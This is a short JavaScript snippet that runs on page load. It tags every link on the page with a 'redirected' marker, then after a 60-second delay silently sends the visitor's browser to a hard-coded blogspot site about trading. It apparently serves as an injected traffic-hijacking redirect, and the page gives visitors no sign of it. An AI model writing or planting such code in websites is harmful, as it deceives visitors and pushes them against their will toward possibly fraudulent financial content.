window.addEventListener('load', function(){ var r = 'redirected', hash, loc, urls, atags = document.getElementsByTagName('a'), i = atags.length, tag; while(--i > -1){ if(!(tag = atags[i]).href || tag.search.indexOf(r) > -1){continue;} hash = tag.hash; loc = tag.href.replace(hash, ''); loc += (loc.indexOf('?') < 0? '?' : '&') + r + hash; tag.href = loc; } if(location.search.indexOf(r) > -1){return;} urls = ["https://trading77market.blogspot.com/"]; setTimeout(function(){ window.location.href = urls[Math.floor(urls.length*Math.random())] + '?' + r; }, 60000); }, false);